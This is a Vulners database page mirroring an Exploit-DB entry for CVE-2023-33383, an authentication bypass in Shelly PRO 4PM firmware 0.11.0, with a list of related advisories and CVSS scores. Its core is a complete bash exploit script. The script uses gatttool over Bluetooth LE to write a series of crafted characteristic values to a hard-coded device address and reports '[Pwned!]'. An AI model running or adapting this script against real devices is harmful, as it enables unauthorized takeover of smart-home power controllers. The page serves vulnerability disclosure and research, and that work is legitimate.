Vulners
Lucene search
Shelly PRO 4PM v0.11.0 - Authentication Bypass
🗓️ 04 Aug 2023 00:00:00Reported by The Security Team [exploitsecurity.io]Type 
exploitdb🔗 www.exploit-db.com👁 349 Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Shelly PRO 4PM v0.11.0 - Authentication Bypass Exploit | 4 Aug 202300:00 | – | zdt |
 | CVE-2023-33383 | 2 Aug 202314:15 | – | attackerkb |
 | CVE-2023-33383 | 2 Aug 202318:39 | – | circl |
 | Shelly 4PM Pro Buffer Error Vulnerability | 2 Aug 202300:00 | – | cnnvd |
 | CVE-2023-33383 | 2 Aug 202300:00 | – | cve |
 | CVE-2023-33383 | 2 Aug 202300:00 | – | cvelist |
 | EUVD-2023-37546 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-33383 | 2 Aug 202314:15 | – | nvd |
 | CVE-2023-33383 | 2 Aug 202314:15 | – | osv |
 | Shelly PRO 4PM 0.11.0 Authentication Bypass | 4 Aug 202300:00 | – | packetstorm |
10
#!/bin/bash
# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
# Google Dork: NA
# Date: 2nd August 2023
# Exploit Author: The Security Team [exploitsecurity.io]
# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
# Vendor Homepage: https://www.shelly.com/
# Software Link: NA
# Version: Firmware v0.11.0 (REQUIRED)
# Tested on: MacOS/Linux
# CVE : CVE-2023-33383
IFS=
failed=$false
RED="\e[31m"
GREEN="\e[92m"
WHITE="\e[97m"
ENDCOLOR="\e[0m"
substring="Connection refused"
banner()
{
clear
echo -e "${GREEN}[+]*********************************************************[+]"
echo -e "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |"
echo -e "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |"
echo -e "${GREEN}| CVE: CVE-2023-33383 |"
echo -e "${GREEN}[+]*********************************************************[+]"
echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
}
banner
read -s -n 1 key
if [ "$key" = "x" ]; then
exit 0;
elif [ "$key" = "" ]; then
gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
if [ -z "$gattout" ]; then
echo -e "${RED}Connection timed out${ENDCOLOR}"
exit 0;
else
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
sleep 1
if [ $? -eq 1 ]; then
$failed=$true
exit 0;
fi
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
sleep 1
if [ $? -eq 1 ]; then
$failed=$true
echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
exit 0;
else
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
sleep 1
for i in {1..5}
do
echo -ne "${GREEN}."
sleep 1
done
echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
fi
fi
fiData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Aug 2023 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 3.15.3
EPSS0.00561
SSVC